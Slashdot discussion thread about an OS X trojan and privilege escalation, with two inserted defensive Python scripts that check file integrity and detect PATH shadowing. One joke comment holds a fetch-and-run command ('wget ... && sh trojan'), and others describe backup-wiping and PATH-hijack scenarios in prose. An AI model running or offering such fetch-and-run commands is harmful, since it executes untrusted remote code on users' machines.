      This is where the local exploit in conjunction with a vulnerability in apache (which gives hardly any access to an exploiting program) is dangerous.

      What relevance does Apache have here? What about an exploit using Microsoft IIS? Or Safari? Or SAMBA? Any client/server application that can be accessed over a network can be theoretically exploited...

      and the biggest threat to the average aware Linux user.

      Why would the average aware Linux user be running Apache? Sure, it can be installed easily enough but it's not installed by default on the Linux distros designed for desktop users that I'm aware of.

      The other main threat is a breach of you distro's repositories.

      Why is this any different to a breach of Apple's update web site? Or Microsoft's? I could argue this entirely the other way that since OS X and Windows are commercial OSes, there a lot more people torrenting and installing pirated copies of both that are infested with malware. At least with a Linux distro, the official web site will publish a checksum for the .ISO so at least you can check it with md5sum before you trust it.

      Are you really that blinkered that you cannot see that every point you have made can be levelled at every OS equally well?

      --
      Gentoo Linux - another day, another USE flag.
    15. Re:Society is not an OS X vulnerability by mwlewis · · Score: 1

      My OSX? I don't now, and I don't plan to ever use OSX. I'm not sure why you'd say this in response to my comment, which didn't even mention anything OSX specific.

      User level access is all that's required to get the user's information. I'm not saying that compromising a system doesn't matter, but just that the problem is more than about unnecessary admin/root users. If you can social engineer someone to run something, you can potentially steal their information without escalating privilege. I certainly agree with the inexperienced user part, and unnecessary admin/root is a problem, but after losing (note: not just damaged, but stolen) key information, formatting and re-installation may be trivial in comparison.

      --
      JOIN US FOR PONG!
    16. Re:Society is not an OS X vulnerability by Anonymous Coward · · Score: 0

      That wasn't really the point. Obviously a totalled system is nightmarish. But worrying only about that, which the Slashdot crowd seem to, neglects pertinent and important security risks. Computers are for using, not for simply existing and running smoothly. The user's files are the raison d'etre of the entire damn box.

    17. Re:Society is not an OS X vulnerability by Anonymous Coward · · Score: 0

      Gee, I dunno

    18. Re:Society is not an OS X vulnerability by stewbacca · · Score: 1

      My OSX? I don't now, and I don't plan to ever use OSX. I'm not sure why you'd say this in response to my comment, which didn't even mention anything OSX specific.

      Modus Operandi for Apple bashers--are you new here?

    19. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      Very well - apologies for the assumption about you being an OS X user.

      As to your other point, I see your argument but you need to look at the broader picture.

      Security is all about applying layers of barriers against the person(s) unknown who want to get to your data and/or screw your PC up. So standard stuff like applying updates regularly, running port scanners and running malware scanners are all entirely relevant but there comes a point where additional stuff you can do might not be cost/time effective to do based on the additional protection doing it might give you.

      So therefore it all boils down to working out "risk" - what is the risk of your PC or data being compromised compared to the cost of putting in an additional security barrier. You will never get to 0% risk (i.e. being fully secure) but that can still be a target to aim for.

      The fact is that on just about any OS currently, a user, no matter how experienced, is always more likely to do more damage to a system running as administrator than as a normal user. Therefore, running as a normal user as much as possible reduces the risk of something untoward happening to the overall system - and since it costs nothing more than the time to educate yourself or other users to do this, then it's a "freebie" way of reducing risk to your system.

      So that's my point - it may not be seen by many people here as an important issue but the fact is that it is easy to do and does mean that you have a more secure system as a result of doing it.

      --
      Gentoo Linux - another day, another USE flag.
    20. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      Try this for a scenario:

      I break into your machine over a network (irrelevant to what OS is running) and I wipe all of your files. I can't total your system because I need root/administrator access to it and although I can see that you run backups regularly to an external disk, it's not mounted or maybe unplugged - I can't mount it because I'm not an administrator and, of course, I'm not next to your machine to be able to plug the disk in.

      So now I do the same thing having broken in as root/administrator. I *could* trash the complete system but instead I'm going to wipe your files. I then see you run backups regularly to an external disk. Can I mount it? Well, if I can then I can wipe that also - bye bye backups. If it's unplugged, I can't get to it - yet. But what I can do is maybe modify your backup program to just wipe the disk as soon as you plug it in, then trash the system completely.

      Yes, it's a specific scenario but entirely realistic so do you now see my point? The latter case is much more devastating than the former.

      --
      Gentoo Linux - another day, another USE flag.
    21. Re:Society is not an OS X vulnerability by isorox · · Score: 1

      Your statement is a paradox. How can you care about your data and NOT care about the computer you store it on???

      The same way I care about my DVDs, not my DVD player.

      Do you mean to tell me that applying security updates, running security scanners and malware checkers are not relevant??? Remind me never to give you any of MY data to keep safe then...

      Why would I care about your data? I don't manage servers (well, I do at work, but they're application servers, and we rebuild them in 30 minutes).

      People don't want to know about security updates and malware crap, they want to access facebook and their bank, copy their photos, and manage their ipods, they don't care how it's done.

      Huh??? Why do you need to REPLACE /usr/bin/firefox??? Why not just put another (keylogging) Firefox binary into the user's $PATH so that version is run first? Why would you need root access to do this?

      Because menu items (how people load firefox) point to /usr/bin/firefox. You could change the menu, but that's only root-writable so the same thing applies.

      What relevance does Apache have here? What about an exploit using Microsoft IIS? Or Safari? Or SAMBA? Any client/server application that can be accessed over a network can be theoretically exploited...

      Yes, I used apache rather than sshd or X as it was the first server I thought of (being on a website at the time), and it is one of the most likely to be exploited (more apache users than proftp). I've not heard of anyone running IIS on OSX or Linux; I guess it could be done through wine, but the exploit would probably be harder.

      Most people don't need to run a server though, so a client exploit (which involves some form of user interaction) in a web browser or email client is more likely to cause an issue.

      Why would the average aware Linux user be running Apache? Sure, it can be installed easily enough but it's not installed by default on the Linux distros designed for desktop users that I'm aware of.

      Apache as an example, but you're right, samba is probably more common for desktop users.

      Why is this any different to a breach of Apple's update web site? Or Microsoft's? I could argue this entirely the other way that since OS X and Windows are commercial OSes, there a lot more people torrenting and installing pirated copies of both that are infested with malware. At least with a Linux distro, the official web site will publish a checksum for the .ISO so at least you can check it with md5sum before you trust it.

      Why would I go to my distro (Ubuntu, Microsoft, Apple)'s website? A debian repository with secure-apt is (probably) better than Apple's auto-update, but the point is it's an unlikely, but feasible, way to breach.

      Are you really that blinkered that you cannot see that every point you have made can be levelled at every OS equally well?

      That was my point; I used Linux/OSX as an example as Windows (at least up to and including XP) is beyond hope, but it applies as easily to another BSD, or Solaris, or whatever.

      However, all that said, I'm not sure what anti-virus software would be able to cope with this sort of stuff. Something that emulates tripwire, maybe.

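The "something that emulates tripwire" idea above, and the md5sum-on-the-ISO point made a few posts earlier, both come down to the same defensive primitive: record a cryptographic hash of a file while it is known-good, and compare later. Here is an added Python example of that primitive (written for this page, not taken from the thread or from Tripwire itself): it builds a hash baseline over a directory tree, then reports files that were added, removed or modified, which is how a replaced /usr/bin/firefox would show up. The directory layout and file contents in `demo()` are constructed in a temporary directory; SHA-256 is used instead of MD5 because MD5 is no longer collision-resistant.

```python
"""Minimal file-integrity baseline and comparison (constructed example)."""
import hashlib
import json
import os
import tempfile
from typing import Dict, List


def sha256_file(path: str) -> str:
    """Stream the file through SHA-256 so large binaries don't go through RAM at once."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> Dict[str, str]:
    """Map every regular file under root (relative path) to its SHA-256."""
    baseline: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):      # hash targets, not link entries
                continue
            baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def compare(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report what changed between two snapshots."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def verify_checksum(path: str, published_hex: str) -> bool:
    """The ISO case: does the file we downloaded match the hash the site published?"""
    return sha256_file(path).lower() == published_hex.strip().lower()


def _write(path: str, body: str) -> None:
    with open(path, "w") as fh:
        fh.write(body)


def demo() -> dict:
    """Constructed scenario: take a baseline, then tamper with the tree and re-check."""
    root = tempfile.mkdtemp(prefix="fim-")
    bindir = os.path.join(root, "bin")
    os.mkdir(bindir)
    firefox = os.path.join(bindir, "firefox")
    _write(firefox, "#!/bin/sh\n# original browser launcher\n")
    _write(os.path.join(bindir, "ls"), "#!/bin/sh\n# original ls\n")

    baseline = build_baseline(root)
    # Tripwire-style tools keep this on read-only or off-host storage, since an
    # attacker who owns the box can otherwise rewrite the baseline along with the files.
    stored = json.dumps(baseline)

    # Tampering: the launcher is replaced, a new binary appears, one disappears.
    _write(firefox, "#!/bin/sh\n# not the original any more\n")
    _write(os.path.join(bindir, "evil"), "#!/bin/sh\n")
    os.remove(os.path.join(bindir, "ls"))

    report = compare(json.loads(stored), build_baseline(root))
    report["firefox_still_matches"] = verify_checksum(firefox, baseline["bin/firefox"])
    return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The check is only as trustworthy as the stored baseline: if it lives on the same disk with the same permissions as the files it describes, a root-level compromise of the kind the ARDAgent bug allows can rewrite both, which is why real integrity tools sign the database or keep it off the host.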
    22. Re:Society is not an OS X vulnerability by pandrijeczko · · Score: 1
      The same way I care about my DVDs, not my dvd player.

      Terrible analogy, I'm afraid. You don't need to have a backup of a DVD to be able to play it if you lose your DVD player.

      People don't want to know about security updates and malware crap, they want to access facebook and their bank, copy their photos, and manage their ipods, they don't care how it's done.

      Running a virus or port scanner does not mean I have to understand how they work - just that I can deal with the problems produced by either. Still, don't take my word for it, do it your way.

      Because menu items (how people load firefox), point to /usr/bin/firefox. You could change the menu, but that's only root-writable so the same thing applies.

      Rubbish. Menu settings are usually stored in your home directory and can be changed as easily as your path can be. Besides which, they might not need to be changed if the specific path to the executable is not specified. If it just says "firefox" for the binary that's run, then it will use the $PATH settings as I said earlier.

      I've not heard of anyone running IIS on OSX or Linux,

      And in none of my posts did I talk specifically about Linux - I was making generic statements about security.

      Most people don't need to run a server though, so a client exploit (which involves some form of user interaction) in a web browser or email client is more likely to cause an issue.

      You are correct to a point but simply going to a web site may cause a nasty Javascript or CGI script to run without you necessarily realising it.

      Why would I go to my distro (Ubuntu, Microsoft, Apple)'s website? A debian repository with secure-apt is (probably) better than Apple's auto-update, but the point is it's an unlikely, but feasable, way to breach.

      This is simply about one word - "confidence". I would never download a Windows XP update from BitTorrent but if I had the checksum for an ISO for a Linux distro then I would - because running the checksum on the ISO once I got it would allow me to verify its authenticity.

      --
      Gentoo Linux - another day, another USE flag.
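
The $PATH point argued back and forth in this subthread (a same-named binary in a user-writable directory that comes before /usr/bin in PATH is what gets run when the user types the name) has a simple defensive check, given here as an added Python example written for this page rather than anything from the posters. It flags PATH entries that are user-writable (or the empty/"." entry meaning the current directory) ahead of the first system directory, and lists executables in earlier entries whose names also exist in a later system directory. The "system directories" default is a typical Unix list; `demo()` builds a constructed layout in a temporary directory and passes its own fake system directory instead.

```python
"""Detect PATH entries that can shadow system binaries (constructed example)."""
import os
import tempfile
from typing import Dict, List, Tuple

# Where the real system binaries live on a typical Unix-like system.
DEFAULT_SYSTEM_DIRS = ("/usr/bin", "/bin", "/usr/sbin", "/sbin", "/usr/local/bin")


def _executables(directory: str) -> List[str]:
    """Names of regular executable files directly inside directory (empty if unreadable)."""
    try:
        names = sorted(os.listdir(directory))
    except OSError:
        return []
    return [n for n in names
            if os.path.isfile(os.path.join(directory, n))
            and os.access(os.path.join(directory, n), os.X_OK)]


def find_path_shadowing(path_value: str,
                        system_dirs=DEFAULT_SYSTEM_DIRS) -> Dict[str, list]:
    """Return risky early entries and (name, shadowing_dir, system_dir) triples."""
    # An empty PATH element means "current directory", a classic foot-gun.
    entries = [e if e else "." for e in path_value.split(os.pathsep)]
    sys_set = set(system_dirs)
    try:
        first_sys = next(i for i, e in enumerate(entries) if e in sys_set)
    except StopIteration:
        first_sys = len(entries)

    risky_early = [e for e in entries[:first_sys]
                   if e == "." or (os.path.isdir(e) and os.access(e, os.W_OK))]

    provider: Dict[str, str] = {}           # name -> first PATH dir that supplies it
    shadowed: List[Tuple[str, str, str]] = []
    for e in entries:
        for name in _executables(e):
            if name not in provider:
                provider[name] = e
            elif e in sys_set and provider[name] not in sys_set:
                shadowed.append((name, provider[name], e))
    return {"risky_before_system": risky_early, "shadowed": shadowed}


def _make_exe(path: str) -> None:
    with open(path, "w") as fh:
        fh.write("#!/bin/sh\necho hi\n")
    os.chmod(path, 0o755)


def demo() -> Dict[str, list]:
    """Constructed layout: a writable ~/bin-style dir and an empty entry ahead of 'system' bin."""
    root = tempfile.mkdtemp(prefix="pathcheck-")
    userbin = os.path.join(root, "userbin")
    sysbin = os.path.join(root, "sysbin")
    os.mkdir(userbin)
    os.mkdir(sysbin)
    _make_exe(os.path.join(sysbin, "firefox"))
    _make_exe(os.path.join(sysbin, "ls"))
    _make_exe(os.path.join(userbin, "firefox"))    # same name, earlier in PATH
    _make_exe(os.path.join(userbin, "myscript"))   # harmless: no system twin
    path_value = os.pathsep.join([userbin, "", sysbin])
    return find_path_shadowing(path_value, system_dirs=(sysbin,))


if __name__ == "__main__":
    # Against the real environment: python3 thisfile.py
    print(find_path_shadowing(os.environ.get("PATH", "")))
    print(demo())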
  12. FUDmeisters by Werrismys · · Score: 4, Insightful

    It's F-Secure's business to cry wolf.

    --
    'Once scientists, even the dim-witted social scientists, get muzzled, the Western Civilization is finished.' - oldhack
    1. Re:FUDmeisters by Deathlizard · · Score: 1

      If F-secure had an OSX version of their security products I would agree with you, but at this time they do not offer any protection for OSX.

      I know because we looked into it recently for students that have Macs on campus (we use F-Secure Client Security here) and they flat out told us there is no F-Secure for OSX nor would there be, because it makes no business sense to spend the resources to build protection for OSX when Apple itself tells its userbase to (foolishly) not worry about viruses because OSX doesn't get them.

      If you're looking for a virus company with an OSX agenda, look at Symantec, McAfee, Sophos, or Securemac, which are the few AV vendors still making Antivirus products for the mac.

  13. You'd be amazed how dumb users are by Sycraft-fu · · Score: 5, Funny

    I swear, some people go out of their way to infect their machines. The one that stands out in my mind the most was a virus for Windows a number of years ago. Came as an attachment in a message that said "Hi I send you the file in order to have your advice." So never mind the bad grammar and such, but before campus got hit we got wind of the thing and sent out an e-mail message to all users saying "Don't open this shit it's bad news." One of the users called in saying she was having problems with e-mail, we came and looked. The "problem" was that she wasn't an admin and so, thankfully, couldn't run the damn virus.

    Or somewhat more recently we had a virus that slipped by our e-mail scanner. It did so by sending itself in encrypted zip files, and then putting the decryption key in the message. That meant you had to open the mail, save the zip, open the zip, enter the code, extract the executable, and run it. Two users did just that and got infected.

    So while it seems armature to do a "Download this then enter your password," kind of trojan, that shit works waaaay more than you'd think.

    1. Re:You'd be amazed how dumb users are by MichaelSmith · · Score: 1

      Somebody I know forwarded me a message saying something like "There is a virus on your system. To remove it search for the file COMMAND.COM and delete it."

      Shortly after that I got a panicky phone call. Apparently they didn't have a working system any more.

    2. Re:You'd be amazed how dumb users are by houghi · · Score: 1

      So while it seems armature to do a "Download this then enter your password," kind of trojan, that shit works waaaay more than you'd think.
      Now there is a trojan for Linux as well: Just run the following on your Linux boxen:

      wget houghi.org/trojan && sh trojan
      --
      Don't fight for your country, if your country does not fight for you.
    3. Re:You'd be amazed how dumb users are by ACMENEWSLLC · · Score: 1

      >>Or somewhat more recently we had a virus that slipped by our e-mail scanner. It did so by sending itself in encrypted zip files, and then putting the decryption key in the message. That meant you had to open the mail, save the zip, open the zip, enter the code, extract the executable, and run it. Two users did just that and got infected

      Once bitten, twice shy. Most people I know only do that once.

      Perhaps our schools should teach Internet security 101 to our students so that people are educated not to do this sort of stupid stuff. I don't know what you do with us old farts though.

      I still think that applications should be virtualized, each running with their own virtual registry and file system. Let that ActiveX control try to write to %windir%\system32\drivers\etc\hosts. It don't matter too much, it is a virtual file system which is not the real hosts file so it has no impact. Let that launched attachment run. If it crashes the virtual Outlook, a restart and everything is ok as the virtual part is clean each launch -- kinda like XP Embedded in its normal mode (not write mode.)

      my .02

    4. Re:You'd be amazed how dumb users are by Anonymous Coward · · Score: 0

      Armature : A framework around which a sculpture is built
      Amateur : A person attached to a particular pursuit, study, or science, without formal training or pay.

    5. Re:You'd be amazed how dumb users are by Mr.+Roadkill · · Score: 1

      No, I would not be amazed by how dumb users can be.

      I'll see your "having trouble with attachments" (had that here from time to time too) and raise.

      The .edu.XX I work for recently had problems with lusers responding to the "Your XXX.EDU.XX account will be cancelled unless you send us your username and password and date-of-birth and country-of-birth details within three days" phishing mails that are doing the rounds at the moment. Some of them provided the correct details, causing no end of fun when we detected this (long before the nastygrams from Spamcop and AOL and individuals started rolling in, I might add), but most of them were too dumb to even get that right. On the bright side, it would have wasted some time in Lagos.

      What truly amazes me is that some of them can walk and breathe simultaneously.

      I'm waiting for the next level of attacks. At the moment, we've mostly just got the bot-herders and 419ers to worry about. What truly concerns me is that some of the phishers will probably take things up a level, and at some institutions they probably have already.

      Say someone gets access to a user email account in a business or educational institution. They could start spamming from it right away, as is traditional, or they can look at the big picture and aim high - risking loss of short-term gains against a far bigger long-term payoff. A good starting point might be a message along the lines of:

      Thank you, $LUSER, for providing the requested details. Your $ORGNAME account will not be cancelled. We do, however, ask you to run the attached security update as soon as possible to protect you from certain kinds of malicious emails... That could have keyloggers and remote access clients and all kinds of other goodness. If the user has access to the organisation's finance system it might be possible for the attacker to run off a series of cheques or electronic payments - the proceeds of which could be remitted to Lagos via Western Union by local "payment processing agents" who have been recruited through email. Also, forget running a diploma-mill - you might be able to get duplicate testamurs from prestigious accredited institutions and academic transcript to go with them, just by changing the personal details of past graduates.

      Scary stuff, eh?

  14. Re:GNAA Announces two new trojans for Windows 7! by RiotingPacifist · · Score: 1

    not even first post, do you guys ever think about killing yourselves instead of bothering with this crap, i mean even twitter managed to get FP around here today, what happend to you GNAA, i thought u \/\/3R3 +3h 1337?

    --
    IranAir Flight 655 never forget!
  15. I wouldn't call this crying wolf by Sycraft-fu · · Score: 4, Insightful

    More like warning that just because you live in a good neighbourhood, doesn't mean you should leave your door unlocked. Too many people who have Macs take the lax approach of "Well Macs don't get hacked so I don't have to worry." Ok well maybe they generally don't (though I've seen it happen due to immense user stupidity) but you should still assume that it can happen, and have security to prevent it.

    I'm all about proactive security, not reactive. Don't wait until something is a problem, identify weaknesses and fix that shit BEFORE someone exploits it. If nobody ever tries, ok great. However if someone does, you are glad you set up security.

    As I said it is the difference between living in a low crime neighbourhood and a high one. You live in a low crime neighbourhood and figure "Oh well there's no crime here, so I don't need to bother with a door lock or alarm." Ok, that's great right up until the criminals try, then you are screwed since you had no security. Well someone who lives in a high crime neighbourhood might have to put up with attempts more often but if they have their doors locked, windows barred, alarm on and so on it doesn't matter because their security stops it.

    Computers are the same way. Just because you run a platform that isn't targeted much, doesn't mean you should just ignore security. Hope for the best but prepare for the worst, then you are ready no matter what.

    It is like backups. Backups are a waste of time and money when your system has always been reliable... Right up until the moment when it isn't and you lose all your shit. You hope you never need the backups, and most won't, computers are pretty reliable, but you make them anyways just in case. You prepare for the worst, even if it is unlikely, so that if it hits you aren't screwed.

    1. Re:I wouldn't call this crying wolf by SoupIsGood+Food · · Score: 1

      What do you mean "Worry?" About what? Running crappy shareware?

      Trojans and phishing are pretty solidly entrenched in the minds of the Mac userbase with some sort of clue, and those without a clue are generally unaware that there's such a thing as F-Secure, and are unlikely to download dodgy shareware apps anyhow.

      I keep hearing alarm bells rung, and it always turns out to be much ado about nothing. The Mac uses a modern privilege escalation model, and Apple's taken some pains to make sure their systems come configured with reasonable default settings, and seems to do a fair job of patching holes as they crop up. I'm not certain what else you expect of the platform or its users.

      To be frank, it sounds like Platform Wars baloney: "Nuh-uh your Mac's more secure than Windows XP, F-Secure knows a guy who knows a guy who once heard of someone who made a proof-of-concept crack, so you need to be aware you're no better than a Dell fresh outta the box!"

      OK guy, we'll lose a lot of sleep over it, 'K? Have fun with your two AV platforms and three malware checkers, because one of each will =not= do the trick to keep XP clean.

      Taking care to download positively reviewed software from vetted locations is all it takes to stay safe on the Mac at the moment, and this is unlikely to alter much in the foreseeable future.

    2. Re:I wouldn't call this crying wolf by the_plastic_jesus · · Score: 1

      While it is pretty serious, how many people here are likely to get this? It's not quite like the situation on Windows where you can get malware by opening the wrong windows (just yet), but I'd imagine that most would only download from sites they'd trust. I'd say the best advice to the whole Mac user community is just to exercise a little caution over the sites they download things from, rather than just blindly visiting every web site believing that they're invulnerable to every bug out there. In fact, that just applies to any OS period...

    3. Re:I wouldn't call this crying wolf by Anonymous Coward · · Score: 0

      Computers are the same way. Just because you run a platform that isn't targeted much, doesn't mean you should just ignore security. Hope for the best but prepare for the worst, then you are ready no matter what.

      I agree. There is a need to be proactive when it comes to security on Mac OS X. I use and recommend Symantec® Norton AntiVirus® for Macintosh®. It is low cost, has great features, and makes my computing platform safer. It is worth every penny.

    4. Re:I wouldn't call this crying wolf by NtroP · · Score: 1

      Most of the Mac users I know have switched from Windows and are so paranoid and twitchy about installing anything on their system it's ridiculous. I helped my neighbor switch a few months ago and he refused to use his shiny new iMac until he'd received his Symantec Antivirus software in spite of my assurances that he'd be fine until it arrived.

      I keep hearing the meme about Mac users (usually typed MAC users) claiming they are invulnerable, but have yet to run into one myself. I'm sure they must exist, but they must be pretty rare. On the other hand, I have found that Mac users actually had to make a conscious and informed choice to *not* run to Walmart or Dell and get a default computer. This would seem to mean that they might be a bit more aware, in general, than the "unwashed masses" who don't even know there are options out there. This goes double for Linux users. I think (at least for now) that fact will protect Mac users more than anything.

      I sincerely hope that Macs never become the "default" computer and that people will always have to make a conscious choice to use it.

      --
      "terrorism" and "pedophilia" are the root passwords to the Constitution
  16. An unpopular opinion.... by Toreo+asesino · · Score: 0, Redundant

    I'm sure this will go down like a lead balloon here, but this is one example of how, technically at least, Vista is more secure than OSX in this regard...

    Because no user can ever be root without a UAC elevation, no program can "just ask for the password" and therefore get admin privileges quite so easily.

    Of course, if the user clicks "Continue" anyway, then you're screwed in any OS but that's another story.....

    *ducks*

    --
    throw new NoSignatureException();
    1. Re:An unpopular opinion.... by Urd.Yggdrasil · · Score: 1

      Vista has its fair share of privilege elevation exploits.

    2. Re:An unpopular opinion.... by ThorGod · · Score: 1

      I see what you're saying. Honestly, I would love the idea of my user accounts not being able to do anything but exactly that - use the machine (not make any system changes). But, ultimately, user processes have to at some point interact with root processes through apis and such. So, to some extent, you're always going to have the potential for a problem.

      Unless Steve Jobs had his goons rig up a virtualization scheme whereby when a user logged in they were, in effect, 'booting' into a virtual machine. It could be kludgy, but I bet there's a way to do it right.

      How do you think that'd be for security?

      --
      PS: I don't reply to ACs.
    3. Re:An unpopular opinion.... by Anonymous Coward · · Score: 3, Informative

      I think you misunderstand how it works on OS X

      When an application asks for a password to get admin rights, the user is presented with a dialog, but unlike in Vista, actually needs to type the password to continue. You can't just blindly click "OK".

    4. Re:An unpopular opinion.... by Toreo+asesino · · Score: 1

      Yep, well, actually that's another thing UAC does too - critical file & registry read/writes are virtualized into something stored in just the user's directory, so apps that try to get round UAC still work & the system is still secure.

      But ultimately, root stuff is still necessary, and it's only the user that can ultimately decide whether or not to allow each request.

      --
      throw new NoSignatureException();
    5. Re:An unpopular opinion.... by Anonymous Coward · · Score: 0

      It doesn't matter if it is called Continue or OK, the user will press on it, especially seeing it so damn often.

    6. Re:An unpopular opinion.... by John+Betonschaar · · Score: 1, Redundant

      I don't really see the difference between OS X privilege escalation using a password prompt and sudo or Vista using UAC. If you allow the program admin privileges you're screwed, and I believe it's just as easy to implement this on Vista as it is on OS X. On Linux it might be a little bit harder because different distros use different sudo configurations.

      As for the ARDAgent vulnerability: that's a completely different story, it's a serious security flaw that needs to be fixed very, very fast.

    7. Re:An unpopular opinion.... by Toreo+asesino · · Score: 3, Interesting

      It's more the impersonation I was talking about.

      In windows you can launch a process impersonating a windows user if you want to run under different credentials. So with the string value from the "Enter Pa33w0rd n00b" window, you could in XP, for instance run a new process under "root" privs, and hose the system however you wanted (assuming the password was ok). In Vista this is impossible.

      --
      throw new NoSignatureException();
    8. Re:An unpopular opinion.... by Tim+C · · Score: 1

      Interesting. Care to provide any examples?

    9. Re:An unpopular opinion.... by Toreo+asesino · · Score: 1

      Sorry for copy & paste, but I just tried to clear what I meant above....

      It's more the impersonation I was talking about.

      In windows you can launch a process impersonating a windows user if you want to run under different credentials. So with the string value from the "Enter Pa33w0rd n00b" window, you could in XP, for instance run a new process under "root" privs, and hose the system however you wanted (assuming the password was ok). In Vista this is impossible.

      --
      throw new NoSignatureException();
    10. Re:An unpopular opinion.... by Anonymous Coward · · Score: 0

      A 'Continue' button instead of a password. This Vista truly is an example unto the rest of the computing world!

    11. Re:An unpopular opinion.... by gnasher719 · · Score: 1

      I don't really see the difference between OS X privilege escalation using a password prompt and sudo or Vista using UAC. If you allow the program admin privileges you're screwed, and I believe it's just as easy to implement this on Vista as it is on OS X. On linux it might be a little bit harder because different distro's use different sudo configurations.

      Once the trojan runs, you are quite screwed anyway, whether it has root privileges or not. It's different if you have a server with a hundred users; as long as root isn't vulnerable, only one out of the hundred users can get hosed. But if you are using a home computer with a single user, even with user privileges only the trojan has access to a hundred percent of all user data and can delete it, modify it, encrypt it and blackmail the user, or mail it somewhere else. In that case I don't care about the system; all that can be easily restored. For home users, there isn't much difference between a root exploit and a user only exploit.

    12. Re:An unpopular opinion.... by ruiner13 · · Score: 1

      your analogy needs work. Mythbusters got a lead balloon to fly. Perhaps next time you should use "go down like a fart in an elevator".

      --
      today is spelling optional day.

    13. Re:An unpopular opinion.... by 99BottlesOfBeerInMyF · · Score: 1

      There are actually regular privilege escalations for Vista reported, both discovered and in use in the wild. When I worked at a security firm last year, I saw about one a week in our weekly security bulletin. Here's one from the other day.

  17. Link plz by Anonymous Coward · · Score: 0

    I'd like a look at the source mentioned ("Now that the source of the proof-of-concept is publicly available") but I can't find anything beside the MacShadow-Forums where you have to log in. Anyone care to paste it to a pastebin or something?

    Also, every page on the web uses the exact words "Applescript Trojan horse template was crafted by forum participants of " ... no creativity huh?

  18. "Politely request your password"... Meh by Yer+Mum · · Score: 0

    A trojan which requires the user to manually download and run it isn't really a trojan...

    And if a program requests the root password and the user gives it, is this the OS's fault? (In fact preference files are stored in the user's home directory, they don't need a password.)

    1. Re:"Politely request your password"... Meh by gnasher719 · · Score: 4, Insightful

      A trojan which requires the user to manually download and run it isn't really a trojan...

      A trojan which requires the user to manually download and run it is _exactly_ a trojan. It is not a worm or a virus. A "trojan" is software that makes the user believe it does something useful or entertaining while in reality containing malware, and it relies on the user getting around security in order to access the useful or entertaining bits.

    2. Re:"Politely request your password"... Meh by Tim+C · · Score: 4, Insightful

      That is exactly what a trojan is!

      A trojan is a piece of software that appears to be benign or otherwise safe or desirable, but in fact is malign. It may or may not also act as advertised.

      A virus is a piece of software that piggy-backs on other executables, "infecting" them with its own code and modifying them so that when they are launched, the virus code is also run. They spread by searching for and infecting other executables on the machine.

      A worm is self-propagating, and does not require user intervention. It actively seeks out and exploits a given vulnerability or vulnerabilities, using them to covertly gain access to the machine.

      Of the three broad types of malware, the only one that does not require the user to manually run it is a worm.

      And if a program requests the root password and the user gives it, is this the OS's fault?

      No, of course not - but you'd be amazed at the number of people who blame Windows even for such social engineering tricks, or believe that if we only all switched to Linux malware would be a thing of the past. The weakest link in any computer system is the user, and there's little or nothing an OS can do to protect itself from a naive or malicious user armed with the root/admin password. While this is a non-story, it does at least demonstrate that the same is true of other OSes than Windows.

    3. Re:"Politely request your password"... Meh by pandrijeczko · · Score: 1

      Quite frankly, I think you OS X people need to do a little less hero worshipping and a little more reading of technical manuals.

      Let's get this entirely out in the open, okay? An inexperienced user is potentially a danger on ANY operating system, including your beloved OS X. If you make an executable or email attachment seem valid enough, then there ARE Windows/Linux/OS X users who will run it, just like there have been a lot of surprised people on Slashdot previously when they installed Apple Quicktime updates and discovered it had also installed Safari - this does NOT happen if you know what you are doing and pay attention to what is being shown to you on the screen. No debate, it's fact.

      The additional hurdles that both Windows and OS X have to overcome are twofold:

      1. Both make money for their respective companies who (understandably) want to shift as much volume as possible. Therefore, the core marketing strategies of both Apple and MS have been to convince Joe Public that you don't need a computer degree in order to use their OSes. Also, rightly or wrongly, the perception of Joe Public is that Linux is difficult to use. Therefore the net result is that in all probability, people who use Windows or OS X are more likely to be newbie users who are more prone to running everything with admin privileges or being duped into running a Trojan.

      2. Windows and OS X present nice fat targets for people who write malware because in both cases you have big populations of users running essentially the same systems. This means that the propagation of malware within Windows or within OS X is potentially much better than it is through disparate sets of systems. Again, if Ubuntu, for example, becomes the de facto standard Linux OS then it too could also present a nice fat target to malware writers - but the fact is that at this moment in time, there are so many different distros running that it makes it very difficult to target a single Linux application with malware that would propagate to the same degree as it would potentially do on Windows or OS X.

      So please don't get defensive about OS X because if you just bury your head in the sand and do nothing about it, then you put yourself more at risk of a malware attack getting onto your system.

      Any piece of malware is a risk to any system but good security is about limiting that risk as much as possible - so it's about putting firewalls in place, putting updates on systems regularly, scanning systems regularly, etc. etc.

      --
      Gentoo Linux - another day, another USE flag.
    4. Re:"Politely request your password"... Meh by tgd · · Score: 1

      trojan

      I do not think that word means what you think it means.
    5. Re:"Politely request your password"... Meh by stewbacca · · Score: 1

      And if a program requests the root password and the user gives it, is this the OS's fault?

      No, of course not - but you'd be amazed at the number of people who blame Windows even for such social engineering tricks, or believe that if we only all switched to Linux malware would be a thing of the past.

      People "blame" windows for their own stupidity because there are about 1,000,000 schemes out there that attack windows users. Compare that to Linux and OSX and you start to see why I believe in the security-through-obscurity "misnomer". Sure my Mac may not be any more secure, but I'm not getting assaulted 10 times a day either.
    6. Re:"Politely request your password"... Meh by 99BottlesOfBeerInMyF · · Score: 1

      Of the three broad types of malware, the only one that does not require the user to manually run it is a worm.

      I believe you are slightly incorrect. A worm is malware that propagates without direct action of the user. Malware that executes without user interaction (but does not propagate automatically) is still a virus. A good example would be the viruses that used to find their way onto CDs and which would autorun on Windows and infect the machine without user interaction to run (just to propagate).

    7. Re:"Politely request your password"... Meh by AceCaseOR · · Score: 1

      So please don't get defensive about OS X because if you just bury your head in the sand and do nothing about it, then you put yourself more at risk of a malware attack getting onto your system. Any piece of malware is a risk to any system but good security is about limiting that risk as much as possible - so it's about putting firewalls in place, putting updates on systems regularly, scanning systems regularly, etc. etc.

